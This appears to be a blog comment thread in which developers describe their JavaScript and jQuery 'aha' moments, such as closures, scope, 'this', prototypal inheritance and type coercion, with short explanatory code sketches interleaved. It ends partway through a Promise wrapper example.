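Condensing the setTimeout-and-this discussion a few comments up into a runnable sketch: a callback invoked as a plain function no longer sees the object it was written inside, so the classic fix is to copy this into a local variable that the closure captures. The names below are made up for illustration, and a synchronous stand-in replaces setTimeout so the result can be checked immediately.

```javascript
var widget = {
  name: "menu",
  later: function (run) {
    var self = this;             // capture the object before the callback fires
    run(function () {
      // called as a plain function, `this` here would be window (or
      // undefined in strict mode), but the captured `self` still works
      return self.name;
    });
  }
};

var result;
widget.later(function (callback) { // plays the role of setTimeout, synchronously
  result = callback();
});
console.log(result); // "menu"
```

The var newThis = this idiom in the comment above is exactly this trick, just with a real setTimeout.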
For me the biggest "ah ha" moment was when I realized I can use console.log(something) instead of alert(something) and check it in the console; the moments when I'm most frustrated are now over. The 2nd one is how $(this) is different than 'this'; sometimes I'm just confused about it and have to console.log(this) to make sure I'm on the right path. The 3rd one is probably the operations in js: I didn't realize that 1 + 1 can be 11 (as a string type) in JS instead of 2 (as a number)… for me that's one of the coolest ah ha moments. But this doesn't mean my "Ah-ha" stops; I think I will probably have many more "ah ha" moments while working with js / jquery in upcoming projects. That feeling of realizing something you should have is so special and I can't wait to have it again.

The moment I learned that strings like "2.13" can be converted to a number by adding + in front of them.

For me it was scope / closures. It is the most common mistake for newcomers.

@Leo V – I have written a blog post introducing the basics of JavaScript from a .Net developer's point of view. It may help you get started: Getting Started With JavaScript

When I realized that you can call 'new' on a function to use it as a constructor for a new object.

For me it was when taking this course just recently.

My moment came when I realized that I could use JavaScript as a steroid for CSS: I could add/remove classes and styles dynamically in ways that I couldn't otherwise do. It's weird though, the more I learn about JS the more aha moments I think I have left to unlock.

My three biggest A-HA moments were: 1. Realizing just how malleable/flexible/powerful the combination of 1st class functions, prototypal inheritance and closures makes JavaScript. 2. When I decided to write a standalone version of a library that I'd originally written with a heavy jQuery dependency by writing my own ultra-minimal version of jQuery, which led me to read the source code of jQuery, Zepto and Underscore to see how they did their "magic".
3. Writing code for node.js.

My moment was when I made a text-based roleplaying game in raw javascript. I used fake js classes to make entities in the engine, with functions as the class member functions. It made making the game a lot easier.

I don't know a lot of plain JavaScript right now, but lately I've been having a huge jQuery "ah hah" moment. It's all thanks to watching the Net Tuts "30 days to learn jQuery" course. I'm stalled on lessons 9 and 10 of 30, but that's mostly because those lessons are having such a huge impact on me. I've been writing jQuery for years now, and was hired at my current job largely because I know a lot about jQuery, but what these lessons have shown me has got me completely re-thinking the way I write jQuery. My "ah hah!" moment has been that I can actually structure my jQuery cleanly. Saying that now, it sounds kind of obvious, but it's having a huge impact on my code. In addition, I've learned a few structuring tips (mostly from the aforementioned course) which are contributing to much cleaner code on my part. I'm now caching any jQuery call I need to do more than once, rethinking the way I structure everything I do in jQuery, using functions and object oriented coding more, scoping my variables, using more control over "this", and defining variables in comma separated lists. Overall, the result is that I'm writing about 1/4th the code in a lot of places, and am finding elements about 1/6th as often. In addition, I've just begun writing my first tiny jQuery plugins. When something needs to be done over and over, sometimes I write a tiny jQuery plugin instead of a function to take advantage of jQuery. I'm beginning to understand what it means to extend jQuery and modify the way things from jQuery work, and I finally understand how to use $.extend() to define defaults and then override them. All of this is taking my code to an entirely new place, with better human readability, faster execution, and much cleaner, leaner code.
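The type-coercion surprises mentioned a couple of comments up ("1 + 1 can be 11", and the unary + trick for strings like "2.13") are easy to see for yourself in the console:

```javascript
console.log(1 + 1);            // 2: number + number adds
console.log("1" + 1);          // "11": + concatenates when either operand is a string
console.log(typeof ("1" + 1)); // "string"
console.log(+"2.13");          // 2.13: unary + converts the string to a number
console.log(+"2.13" + 1);      // now it adds as numbers
```

This is also why values read from form fields or the DOM, which arrive as strings, often need a unary + (or parseFloat) before any arithmetic.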
My ah ha moment recently was realising how little JavaScript I actually know! And realising it’s important for me to learn the basics as well as knowing how to do a bit of cool stuff with jQuery. Another ah ha moment was realising about reusing and passing things to functions, and at the same time realising how way too long and messy my code had been :D but overall realising how many more ahha moments I have to come as I learn and improve :) I learned JS with jQuery as an entry point. A big step for me was learning how to use events and realizing that events can be triggered manually. Understanding OO in JS was also a big step. When I realized that I could use the Firebug/Chrome/IE console to quickly test any code or functions. – If I don’t remember how that function works, I test it in the console. – If I’m not sure about the syntax, I test it on the console. – If I don’t know if this piece of code is going to work, I test it on the console. ;) … when I found out that “Everything is an Object” is only half of the truth – the interpreter is one big, event-based eval loop, and from its point of view everything is a function. Inside JS, “eval is evil”, but var f = new Function () { ... }; is FTW, the same with var obj = new function() { ... }. ‘new Function () { … }’ doesn’t work. It’d be ‘new Function ("…")’, but that is just an alias for eval. You have all the problems with new Function as you do with eval. But you can make eval-free functions that do what you want pretty readily: (Indentation doesn’t seem to be preserved…) The other one is an interesting way to use a one-time constructor that I haven’t seen before. I’m going to add that to my list of useful patterns. @Havvy: yes, you’re right. It should be new Function ("..."). Sorry for that. But it’s far more than an alias for eval(). eval() instantiates and executes in one step, with little or no chance to prevent bad things from happening.
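To make the new Function debate above concrete, here is a small sketch of the correct string-body form, plus one real difference from eval that the thread touches on: the created function does not see the local scope it was built in:

```javascript
// new Function takes parameter names and a body, all as strings.
var add = new Function("a", "b", "return a + b;");
console.log(add(2, 3)); // 5

// Unlike eval, the generated body cannot see surrounding local variables.
function demo() {
  var secret = 42; // local to demo()
  var peek = new Function("return typeof secret;");
  return peek();
}
console.log(demo()); // "undefined" — the local `secret` is invisible
```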
With an encapsulated try/catch inside the “create Function” block you can verify the new function before returning it to the calling context. Invoking or binding it to a new context is a totally different step :-) The var obj = new function() {...} constructor works nearly the same as a closure or immediately invoked function, but has some advantages (at least in my opinion). It allows private vars and functions inside the created object like the others, but accessing vars from its calling scope is way more predictable (the same with this). This comes in handy when doing crazy stuff like nesting this type of constructor and still having access to its base calling scope’s vars. This way, you can have private, class-shared, protected and public (from the base-class point of view) vars the easy way. But that’s far beyond clickety-find-do-DOM-stuff . . . I had quite a few “a-ha!” moments with JS, but one of the biggest was understanding PHP hooks, which are basically very similar to JS callbacks. My a-ha moment was when I realized that I could build object-oriented JavaScript apps. This gave me a lot more opportunities to look at the power of JavaScript. The deeper you dive into it, the more you want to experience. My JavaScript Ah-ha! moment was when I realized how scopes work. Mine was when I realized that HTML elements were just that (elements) and that jQuery could find and affect these elements however I want. As said above, “find this, do that”. Haven’t found many uses for JS beyond manipulating the DOM, but I’m sure it will pop up someday and I’ll have another ah-HA moment. When Douglas Crockford called the trailing parentheses of an immediately invoked function ‘dog balls’. Ha ha ha! Hilarious! I love how Douglas Crockford can present a dry topic like programming and interject just enough humor to keep the audience engaged. I saw this presentation and I disagree with Mr Crockford here (and not only here).
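The var obj = new function () { ... } one-time constructor described above can be sketched like this — a minimal illustration with private state; the counter itself is my own example, not the commenter’s:

```javascript
// The anonymous function is defined and invoked with `new` in one step,
// producing a single object whose `count` stays truly private.
var counter = new function () {
  var count = 0; // private: closed over, never a property of the object
  this.increment = function () { return ++count; };
  this.current = function () { return count; };
};

counter.increment();
counter.increment();
console.log(counter.current()); // 2
console.log(counter.count);     // undefined — no direct access from outside
```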
He says that the reason why he puts the parentheses outside the invocation is that the whole invocation is important, not just the function. But these parentheses are not there to show what is important. They are there to ensure that this is a function expression, in contrast to a function statement. An invocation is always an expression, so there is no need to enclose it in parentheses just to show that it is an expression. It just messes with heads ;) So in the end, explaining the situation like Mr Crockford did does not help in understanding what is really going on in this language. For me the JavaScript “Ah ha!” moment was just called jQuery. Even though it’s pretty wrong to call it that, because knowing jQuery can make you think you can write JavaScript, but that couldn’t be any further from the truth. jQuery just makes it incredibly accessible by using the CSS selectors and convenience methods like slideUp/slideDown. Writing these in native JavaScript would be a pain in the ass, and most jQuery writers wouldn’t even know where to start. Of course, since jQuery is here to stay, this isn’t really an issue. As long as we’re not talking about JavaScript performance (and mobile), that is. @bigbossSNK Hahaha, I laughed my balls off when I was watching this! #dogballs Mine was the moment I came into existence. This is exactly what I explain every time people ask me how I learned web design! It’s that one moment where you suddenly see how it all works, and then everything becomes so much easier. I actually learned most of the coding myself, just googling simple things like how to fetch a query in PHP (which, btw, was my aha moment), and then I just kinda knew the language after a while. I have read several articles about Closures, but I had a hard time understanding the concept. Once I read that it’s just about returning a function to the global namespace, that was my ah ha! moment.
When I realized JavaScript has nothing to do with Java. I think I have had a couple over the last couple of years, but the one I am looking most forward to is one that hasn’t happened yet – wrapping my head around MVC in JavaScript. I have a project where most of my prior Ah-ha moments have shown up, so I am looking forward to spending some time rebuilding it using MVC concepts. For me that moment was when I came to know about automatic semicolon insertion. Douglas Crockford had rightly suggested having the starting curly brace on the same line instead of on a new line. I started off with jQuery, but ever since I started looking at JavaScript seriously, I have fallen in love with it and have seen more than one aha moment :) FYI, here are other places where automatic semicolon insertion takes place: var statement, empty statement, expression statement, do-while statement, continue statement, break statement, throw statement. Scope in closures works exactly how you think it would work if you forget all the nonsense object-oriented languages have pushed into your head. This also made me much better at C# as I really understood lambdas. $.extend. The captain-obvious post on making JavaScript functions that return other functions. Learning a smattering of Prolog and coming to understand how, with boolean type coercion, && and || are close cousins of the semicolon. DOM events bubble up. Wow, I think I’ve forgotten my personal JS a-ha! moments, but I’ll try a few basics: 1. DOM stuff (window, document, onclick etc.) is not actually JavaScript; they’re things provided to JavaScript by the browser. That is where 99% of the cross-browser issues are with JavaScript; outside the DOM, it’s plain sailing in comparison as far as cross-browser compatibility is concerned. 2. In a browser, everything is in the window object, so: Can be invoked by: or 3. Dot notation is interchangeable with bracket notation, therefore you can also: and therefore via a variable: 4.
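The brace-placement advice mentioned above has a concrete failure mode: automatic semicolon insertion turns a return followed by a newline into a bare return;. A small sketch of the difference:

```javascript
// ASI inserts a semicolon right after `return`, so the object literal
// below becomes an unreachable block statement; `broken` returns undefined.
function broken() {
  return
  { ok: true };
}

// With the opening brace on the same line, the object is actually returned.
function works() {
  return {
    ok: true
  };
}

console.log(broken()); // undefined
console.log(works());  // { ok: true }
```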
‘in’ is not just for use in a for loop; you can also use it as a test: 5. || and && do not return true or false, they return the last evaluated operand. 6. DOM collections are not array objects (they’re not JavaScript, remember?), and doing getElementsBy…() will return you a live collection. For example, when you reference .length it will evaluate the getElementsBy…() all over again to recalculate the length, so if you do the following, you will have an infinite loop: Pfft, that’s all I can think of right now, without getting too advanced. I’m a pretty hard-core software engineer… I’ve written safety-critical software for aircraft and submarines. And I’ve yet to have my JS ‘Aha!’ moment. But I know what it will be: it will be when I understand the damn scoping rules. I guess I’m just not used to using such a loosely-typed and event-driven language, and I don’t get what’s in and out of scope, especially when you’re passing functions around as data to events. I’ve also stayed away from writing big apps in JavaScript so have never had an excuse to dig in to the finer details of scope and closures. One day. I prefer my submarine software writers use something a little more ‘better’ and leak-proof. :) I think you just gave me mine when you described it as a “find something, do something” library. Thanks! (I’ll probably still let someone else write it though, I like CSS just fine.) When I realised that it was actually a real, formal and complex language rather than the nasty little scripting thing that ran in browser clients (which is how I had thought of it for the first few years of being a web dev). For me it was that JS was: prototypal; event-based (which was great with …); had closures, which finally gave me the AHA; oh, and had first-class functions. Mine was when I learned that Ctrl+F5 refreshes JavaScript in a browser. Sure, it was long ago.
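Point 5 above — || and && returning the last evaluated operand rather than a boolean — is worth a tiny sketch, since it is exactly what makes the common default-value idiom work:

```javascript
// || returns the first truthy operand (or the last one); && returns the
// first falsy operand (or the last one). No booleans are produced.
console.log(0 || "fallback");     // "fallback"
console.log("first" || "second"); // "first" (short-circuits)
console.log("a" && "b");          // "b" (both truthy, last operand wins)
console.log(null && "never");     // null (short-circuits on the falsy one)

// The classic defaulting idiom built on this behavior:
var userName = undefined;
var display = userName || "anonymous";
console.log(display); // "anonymous"
```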
My “aha moment” in JavaScript was when I realized that everything in JavaScript is objects (I know it sounds silly…), like CSS: many boxes with smaller boxes inside… jQuery is a WOW library just because it helps developers to develop a new way of thinking about JavaScript. All the other features are great, but they are not the unique characteristic which made it WOW!!! A month or two ago; until then I just stumbled through it. It’s gone: html -> css -> php -> Javascript -> Jquery. I think I’m close to the “Ah ha” moment, but still thumbing through and customizing open source for now. I love jQuery! Functional/logic programming; closures; objects, objects everywhere. I love how JavaScript “Ah-ha” moments have a tendency to invalidate each other. “Ah-ha! That’s how you force it to do X instead of Y!” “Ah-ha! Y is actually way better than X!” I guess the biggest Ah-ha was watching the Crockford videos and realizing it’s not broken, it’s just not conventional, and if you’re fighting the language then there’s probably a better way of doing things. Man, I just had that “jQuery book on a flight” ah ha moment last weekend! Awesome feeling. Don’t know why I was so hesitant to start learning it… I really, really liked it when I saw my own functions act just like JS built-in ones using the prototype property, and I was really happy to know that I don’t have to install anything on my system to get JSON to work!! LOL For me, it was reading: DOM Scripting: Web Design with JavaScript and the Document Object Model by Jeremy Keith. I still recommend this book to anyone who’s just getting started with JavaScript. Seconded – a great book for getting started, and Jeremy has an awesome way of making things easy to understand, especially if you’re more from a design background :) Kind of different “a-ha!” moments at different stages. My first was very much like Chris’s, except that rather than reading a book, I was blindly using a plugin that didn’t quite do what I wanted.
I decided to look at the code, and since it was jQuery (which used CSS-like selectors) it was pretty intuitive. All I needed to do was change where the plugin was expecting a certain ID to expect a particular class, and it worked. I could change what was being found, and I could make different things happen with it. A-ha! Almost around the same time, it became clear how to pass values and objects around. For a few days, I honestly thought when I was seeing a function like function(foo, bar) in sample code that there was some sort of significance to the ‘foo’ and the ‘bar’ and I had to figure out what valid values could go there. ;-) Didn’t take long to smack my forehead, but it threw me for a loop at first, not having any sort of development background at all. Other pieces of learning were incremental. Starting to fold in ‘vanilla’ JavaScript as I learned it and when appropriate (this.id vs $(this).attr(‘id’) for example), understanding how to troubleshoot timing issues and resolve race conditions. And then while I was actually trying to solve another problem (application namespacing to avoid polluting the global namespace) I really finally understood objects. So that’s really the second “a-ha!” moment. Since then I’ve been in another incremental learning phase, but I’m sure another a-ha moment isn’t far behind. Scope. 1) DOM 2) Anonymous functions 3) CoffeeScript – anonymous functions – everything is an object – function scope – closures – self-invoking functions Realising that it was all about the DOM: accessing its elements and manipulating them in some way, whether it’s changing the appearance of something, adding an element to it or removing an element. From there everything is simplified to a question of working out the elements I want to work on, what their final state should be, what I want to do with them, and how to do it. Simples. Mine was understanding the use of the ‘var’ keyword in JavaScript, variable hoisting, scope & prototypal inheritance.
Discovering that null, undefined, 0, false (of course) and “” are all false-y, and that a single truthiness check is enough to test for a false-y variable! \o/ An ongoing chain of revelations: – sure, the everything-is-an-object concept – the short form of object declaration and instantiation by using brackets – breaking the same-domain policy by using JSON/JSONP. One favourite, though not a “now I understand” experience, was the fact that you can completely circumvent XMLHttp by re-using the src attribute of a known script object. Everything can be fetched from anywhere as long as you can encode it as JS. Finally my feed-reader webapp became possible. Currently reading this blog through it… My JavaScript ah-ha moment was jQuery. It was when I figured out how variable scopes worked in JavaScript. Like when you set a variable and then define a closure; then whenever that closure is called, it has access to that variable. When I realized that you could pass arguments into functions. When I realized that functions are also objects… Same as you Chris, discovering jQuery and all its powers and capabilities. Before that JS was a mystery; after that it became accessible. Now I’m learning more and more “core” JS. :) The power of jQuery made me shout “Yay!” when I wanted to have my entire form div background color changed on focusing any of the inputs, and I was trying to do it with CSS (can’t happen) since I had more than one form on the page. So then I used: since the div I wanted to apply the color to was the 3rd parent of “this” input. Still I’m waiting for a pure CSS solution to this. Still waiting for it. I still can’t quite wrap my head around the type of object-orientation that goes on in JavaScript. I have no problem with Java, Python, PHP or even Lua-style OO, but JS just breaks my brain. I felt absolutely the same until I read Stefanov’s book (I like Crockford, but he always makes it sound as if there is some hidden genius in JS). My Aha there was that in JS object-orientation is kinda left up to you.
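The falsy list that opens the comment above can be verified in one pass; this sketch contrasts the verbose comparison chain with the single truthiness test (the function names are mine):

```javascript
// Every value the comment lists is falsy, so `!value` is true for all of them.
var falsyValues = [null, undefined, 0, false, ""];
var allFalsy = falsyValues.every(function (value) { return !value; });
console.log(allFalsy); // true

// Instead of enumerating the cases...
function isEmptyVerbose(x) {
  return x === null || x === undefined || x === 0 || x === false || x === "";
}
// ...a single truthiness check covers them all:
function isEmpty(x) { return !x; }
console.log(isEmpty(0), isEmpty("hi")); // true false
```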
It is just an implementation thing which you can use to achieve OO-like effects. If you come from languages with pointers, think of JS objects as structures which always come with three pointers: constructor, prototype and __proto__. Now, when creating new instances, point these pointers to different places and you get different types of “inheritance”. A very powerful and flexible mechanism – no question about it – but so easy to mess up too. And all of this could be done without any of the native, supposedly OO elements of the language. I love how even for prototypal inheritance (which is supposed to be native in JS) Crockford always has a currently favorite way of implementing it. Or the only other native OO thing there – the “new” operator – being considered harmful by some? On the other hand, partially this is what made beautiful things like jQuery possible… Understanding how information hiding can be achieved using function scopes. I found the importance of JS and jQuery while customizing iphonelu’s audio player, and my daily routine adding onclick events for drop-down menus on mobifreask’s free mobile website templates. As others here have mentioned, for me it was watching and reading Crockford. When I read the history/background of the language it all made a lot more sense – I no longer felt frustrated and confused as I had been just by hacking at the language with a Java/C mindset. He explains: “JavaScript’s C-like syntax… makes it appear to be an ordinary procedural language. This is misleading because JavaScript has more in common with functional languages like Lisp or Scheme than with C or Java.” Apparently the language was named JavaScript as a marketing thing, as Java was “it” at the time. Awfully confusing choice of name! Speaking of JavaScript, I get a JS error when viewing this website in IE7. I think you’re missing or have an extra comma somewhere in your JS.
My biggest JavaScript “Ah-ha moment” was when I found out that you have to define functions in AJAX callbacks so the newly loaded content can access your functions. My “Ah ha!” moment was the day that a friend told me about a new framework that was in development called jQuery. I have yet to experience my ‘aha’ moment for JavaScript in particular, but along a similar line is my ‘aha’ moment for object-oriented design in general. I was banging my head against the wall all evening trying to get some code working, and went to bed. I woke up in the middle of the night and thought to myself… “Wait! I get it!”. I realized that I had been stumbling through my code with some hodgepodge of procedural-OOP-spaghetti mess. I suddenly understood the whole concept of creating an object once and using it anywhere throughout the site, or any of my sites for that matter. I knew what it meant to write a self-contained class that could be used wherever I needed it, across all of my projects. It was like a paradigm shift for me. It was a cool feeling. Had my “Ah ha!” when I realized that I can do jQuery, but not raw JavaScript. And I’m still not sure if this is a good or bad thing – but it works for me. I’m just the opposite. I know my way around jQuery, but unless a client demands it, I’d take vanilla JavaScript over a library any day. Yes, I know the risks (browser inconsistencies, mainly), but I have yet to see a decent library that actually encourages using JavaScript the way it’s meant to be used. My problem with them is more about the mentality behind them than the frameworks themselves. JavaScript should not be used for animation or styling; one should use CSS. It shouldn’t be used for content generation or script loading; one should use a server-side language or just HTML for that. Most importantly, a website should not rely on JavaScript to function (except in special cases, such as Gmail or something similar).
Worst of all, though the frameworks themselves are rarely that big, relying on them can quickly bloat a website. My company’s ‘mobile site’ had to load over a megabyte of JS libraries just to function, and its perceived loading time was 3 times longer than that of the desktop website. I guess what I’m saying is that it’s good to know the fundamentals, if possible. I wrote a very small and basic jQuery truncate function. That was my Ah ha moment; from that I started to get better and better at JS and jQuery. Still have a lot to learn, but this definitely was the beginning of a good JS career for me :) First when I realised there are two ways to access object properties: Then when I realised the second type doesn’t even have to use a string: or maybe: or even: Careful there, the object you use within the brackets will be indexed using its string representation (toString() will be called), so if that turns out to be “[object Object]”, and you’re not aware of that, then you can end up with some unexpected collisions. Hmm, now that’s interesting, I didn’t know that, thanks :) When I discovered getElementsByTagName is a live collection. For me it was the moment I discovered I can debug JavaScript in the Firebug console using debugger; Good post! Here are some tips on how one can evolve in the field of web design: 1. Keep up to date with news through design blogs, or perhaps learn a new web language. 2. There are many fantastic web design books and magazines out there covering a wide range of subjects with ever-increasing depth, as a source of education. 3. Web resources like Six Revisions are great for learning new techniques. 4. Remember to verify anything you learn through a third-party resource. There’s an awful lot of outdated information out there (like W3Schools), and verifying helps you get rid of bad habits. 5. Sites are beginning to teach classroom-style lessons and video-based instruction classes (e.g. Lynda.com) on web design and development.
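The collision warning above — “the object you use within the brackets will be indexed using its string representation” — looks like this in practice; the store/key names are illustrative:

```javascript
// Property keys are strings (before Symbols existed), so an object used in
// brackets is coerced via toString() — "[object Object]" for plain objects.
var store = {};
var keyA = { id: 1 };
var keyB = { id: 2 };

store[keyA] = "first";
store[keyB] = "second"; // same "[object Object]" key: silently overwrites

console.log(String(keyA));              // "[object Object]"
console.log(store[keyA]);               // "second"
console.log(Object.keys(store).length); // 1 — only one property exists
```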
They can get pricey, but they will be among the best investments for your future. A-ha! Numbers, booleans, strings etc. A-ha! if/else. A-ha! for/while loops. A-ha! Functions, objects, methods. Until I know the whole grammar of this language, there will be a few more a-ha moments. For me, the most important a-ha moments will be when I realise what I can do with the DOM. For me, as I am not writing real computer programs, it will be most important what I can do for my web design with JS. To do these things the best, cleanest and lightest way, I think it’s important for everyone to know how pure JS works. A really good source to learn JavaScript is Codecademy, which I am actually using. For me, there has never been an easier way to learn a web-related technology, so I can really recommend it to everyone. This thread is turning out to be an excellent tool for compiling a reading list as a jQuery/future plain JavaScript developer. The recurring themes cited by advanced JavaScript developers that took them to the next level are really inspiring me to learn, and giving me some great direction with which to do so. The moment when I realized the difference between this and $(this). I wouldn’t claim I have a “decent understanding” of JavaScript, or anything for that matter, but watching a series of talks by Douglas Crockford blew my mind. While my code is still a silly mess, at least now I know what sucks about it (to some degree at least), and more importantly I now can think stuff up and get it working in some shape or form without much pain — instead of at best modifying copypasta while having hardly any clue how and why it works, and at worst just having to pass. ^ they’re on YouTube, too. If you’re like me, you might have a fever-like reaction to it: unable to stop watching, while feeling the urge to put what you’re hearing into practice, which is a bit like needing to sneeze and pee at the same time. Best brain pain ever!
Personally, I’m looking forward to watching them all again at some point in the future and actually being somewhat able to follow; that will be awesome as well. Hope this helped anyone, and thanks to Crockford either way. My ahha moment was picking up jQuery. I guess you could say I’m still waiting… When I used alert-type validation and my sir told me to use better, more stylish validation, and it worked the first time — well, it’s not an ah ha like that, so I’m still waiting. Biggest Aha so far – we are stuck with it… (so better learn it). My ah-ha! moment was definitely when I grasped the concept of “this”, both in JavaScript and in PHP! It’s such a simple concept, yet it can be so difficult to wrap your head around at first. Once I got that down, my programming life became a hell of a lot easier. I’m not a professional or anything like that, but I would say that moment came along when I figured out how to display data from other pages using JavaScript/jQuery after weeks of searching. My aha moment was when I learned the power and ease of truthy and falsey expressions in JS. No more “if (x == “” || x == 0 || typeof x == “undefined”)”, now I can just do “if (x)” #booyah jQuery aha! – Chaining and callback functions. JavaScript aha! – How objects work and how to use them. – What the DOM is and how exactly it works. I am still waiting for an AH AH moment. I read tutorials, watched videos, but I still can’t wrap my head around jQuery. I mean, I can do the simple stuff like hide and slide this down, but besides that I can’t go any further. I don’t know what it is… I don’t even know what an Object is! UGH. Sadness.
I’m in the same trouble here, mate. I can only seem to manage little things like slide, hide etc., but nothing else, and I’m desperate to get this ah haaa moment. I’m watching video tutorials, reading books, tried Codecademy, but nothing seems to click for me ((( I asked for suggestions here but no one answered; please, if anyone has any shortcut or hint, tip, or tutorial, please post… Leo, have you tried meeting up with others and trying to learn in a group setting? For me what’s helped was deciding to take a course at a school to learn the basic fundamentals, which has really helped me get a better understanding of what’s going on. Prior to this I had tried everything you described and nothing caught on. I think it comes down to knowing yourself and how you learn best. I still have a long way to go with lots of sleepless nights, but I’m setting a good foundation. Amazing similarity in all these moments when the ‘penny dropped’. It was exactly the same for me: I got to learn that everything was an object fairly early on… And then you think you’ve got it nailed, you start throwing stuff out there and bam! namespace conflicts with plugins or other bits of code – and you’re back to being humble once more… you learn about namespacing and closures and stuff… And then ‘this’ – you think, what the hell is ‘this’? Oh woe of man, did it take me forever to ‘get’ this, or is it ‘get this’, or maybe get ‘this’; one thing for sure is when you do get this, you’ve got it. I’m still “getting” JS, but for me, the biggest “ah-ha” moments I’ve had were when I figured out how if/else statements work (just like PHP!), how to use console.log(), and that JS is essentially just variables and functions – in that order. I’m working toward my next ah-ha moment by diving into encapsulation :) For me it was when I found phpjs.org. All the PHP functions converted to JavaScript… I think Chris’s explanation of jQuery just gave me my jQuery aha moment. My ah-ha moment was the prototype in JavaScript.
I already knew the ‘everything is an object’ idea from my explorations of Ruby, so that made sense – it was the lack of classes that really broke JavaScript in my head. Then I read JavaScript: The Good Parts, and he nails the prototypal nature of JavaScript. That’s when something clicked in my head (I was reading about evolutionary theory at the time as well) and I put prototype together with ‘last common ancestor’ and it really just clicked: extend a class by finding the prototype object down the chain that should carry the extension, and diverge from there. Really, all of JavaScript: TGP is one big ‘oh THAT’S how you do that’ moment. Object scopes, “knowing what *this* is referring to at any time”, and the DOM event system, “learning that you can #addEventListener”. Anyway, I use CoffeeScript now; it really simplifies everything. In CoffeeScript something like this… Becomes this… And the most amazing thing, something like this… Can be written like this… Prototypal inheritance is probably one of the hardest concepts I had to wrap my head around, but once I realized how this paradigm worked, it made sense. I always wanted JavaScript to be clean and class-based, but the prototype chain was a new outlook on programming. Discovering jQuery to get away from that mess. I started learning JavaScript a long time ago – it will be over 10 years now – way before I had my first Internet connection. The content I was learning from was a simple JavaScript web tutorial, zipped on a diskette, and a tutorial in a computer magazine. Because of that I was mostly discovering the language by myself, so there were many Aha! moments. My code then was a total mess (Whitespace and new lines? Who needs that! The more code fits on your screen the better), but weirdly I completely knew what was going on there. I wasn’t using var statements, because I didn’t see the difference between using them and simply just using a variable.
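The “find the prototype object down the chain and diverge from there” idea above can be sketched with Object.create; the animal/dog example is mine, not the commenter’s:

```javascript
// animal is the shared ancestor; dog diverges by overriding on its own
// object, while lookups that miss on dog fall back up the prototype chain.
var animal = {
  describe: function () { return this.name + " makes a sound"; }
};

var dog = Object.create(animal); // dog's prototype is animal
dog.name = "Rex";
dog.describe = function () {     // divergence: shadows the ancestor's method
  return this.name + " barks";
};

var creature = Object.create(animal);
creature.name = "Blob";

console.log(dog.describe());      // "Rex barks"
console.log(creature.describe()); // "Blob makes a sound" (inherited)
console.log(Object.getPrototypeOf(dog) === animal); // true
```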
Later on I discovered that the arguments of functions have a strange ability not to be seen beyond the function. So I started using them like this: which with my current style of writing looked like this: Then I tried var again. It was probably my biggest Aha! moment. My latest Aha! moment is about this: Yeah, the comment is a little bit TL;DRy, but I hope you liked it :) How does (object.method || function(){})(param); not work as expected? Perhaps your expectation was wrong, but that does do what you’re telling it to. (Although it seems to favour anonymous functions, which are a poor substitute for functions which can be referenced by name.) Well, as you can see from the second line, my expectation of this invocation’s effects was different. Maybe I didn’t express that clearly enough; I should have written “… as expected by me”. What do you mean by “poor substitute”? Performance issues? Well, performance wasn’t so important there, so I wrote it in a way that is easily understandable by me. I often use constructions like (object.notSureIfThisPropertyWillExist || {}).foo, so I wanted to use something similar for methods. Maybe I should start using some global-scoped noop function, but for now I don’t feel the need for that. Anyhow, I have chosen the third option (which is really the second one). But feel free to criticize my code/style/habits. I’d love to learn something more and therefore be a better programmer. Cheers. Well, no. I meant the statement (x || y)() is saying “call x, if it isn’t there then call y”. In your example x is a function on an object that you can call multiple times (that’s the point of public functions, right?), but y is not. This problem is usually approached this way: if(!x) x = y; which says “if x isn’t there, then y is x” – that’s how most shims work. But that is not a shim. I don’t want to replace that nonexistent method with a noop. The role of this expression was rather something similar to a try statement (or @ in PHP).
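For readers following the (object.method || function(){})(param) exchange above, here is the pattern in runnable form; modern code would reach for object.method?.(param) instead:

```javascript
// Call the method if it exists; otherwise fall through to a no-op, so a
// missing method yields undefined instead of throwing a TypeError.
var object = {
  greet: function (name) { return "hi " + name; }
};

var result = (object.greet || function () {})("sam");
var missing = (object.absent || function () {})("sam");

console.log(result);  // "hi sam"
console.log(missing); // undefined — the no-op ran instead of throwing
```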
A try statement, which is considered rather slow and is advised to be used in the topmost scope (and I used it there), was just not so necessary here, because I can do the checking with if or || or &&. You said: “In your example x is a function on an object that you can call multiple times (that’s the point of public functions right?), but y is not.”. P.S. I misclicked and that comment ended up in the main thread. Please ignore it. Sorry ^_^’ Oh, I now get where the confusion may come from. I showed a generalized example: I just wanted to call attention to calling a method. In reality it looked a bit different: Now, looking at that from a different perspective, it may seem like I was trying to achieve something else. Nevertheless, it still might look confusing why I was even trying such an approach. But trust me, in context it suits much better than you think. Cheers. Excellent post. It’s incredible how many people go through the same experiences. I too had “Aha” moments. My first one was when I discovered that jQuery is not some alien language and that it’s so easy to understand. But that is not a shim. I don’t want to replace that nonexistent method with a noop. The role of this expression was rather something similar to a try statement (or @ in PHP). A try statement, which is considered rather slow and is advised to be used in the topmost scope (and I used it there), was just not so necessary here, because I can do the checking with if or || or &&. You said: … That upper comment was meant to be a reply; I posted it above, so you can ignore or delete it (if you are able to). Sorry for the inconvenience, my bad ^_^’ :) That’s the first time you mentioned no-op!!! I didn’t take your empty function literally; I thought that was for brevity. Yeah, I don’t see anything wrong with if(x) x(); personally. I mean, compared to x && x(), that’s not a very nice thing to do to other developers who don’t have JavaScript as their first language.
Mine would have to be learning how easy it is to do an asynchronous XML/HTTP request:

—–
var req = (window.XMLHttpRequest) ? new XMLHttpRequest() : new ActiveXObject("Microsoft.XMLHTTP");
if (req == null) throw "Error!";
req.onload = function() { console.log("Success!"); };
try {
    req.open("POST", address, true);
    req.send(data);
} catch (e) { throw "Error!"; }
—–

For the longest time, I thought AJAX was some amazing JavaScript 'thing' that required advanced frameworks to implement. I also had another (somewhat perturbing) "aha" moment shortly after, when I discovered that most libraries that use "AJAX" encourage you to use it to inject raw HTML/JavaScript into webpages (parse errors and security holes galore!).

Mine was when I read that, while OOP adds behaviors (methods) onto state, JavaScript's functional approach is just the inverse: allowing state into functions.

The moment when I tried to create my own accordion script because I found the one in jQuery kind of hard to set up. And I didn't even know how to code any JavaScript, so that meant reading through the docs and learning the language.
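One follow-up on the request snippet above: the onload/try/catch plumbing can be written once by wrapping it in a Promise. This is only a sketch; the transport argument is a stand-in for the XMLHttpRequest object so the example stays self-contained:

```javascript
// Promise wrapper around a callback-style requester. `transport` stands in
// for an XMLHttpRequest-like object (open/onload/onerror/send).
function post(address, data, transport) {
  return new Promise(function (resolve, reject) {
    try {
      transport.open("POST", address, true);
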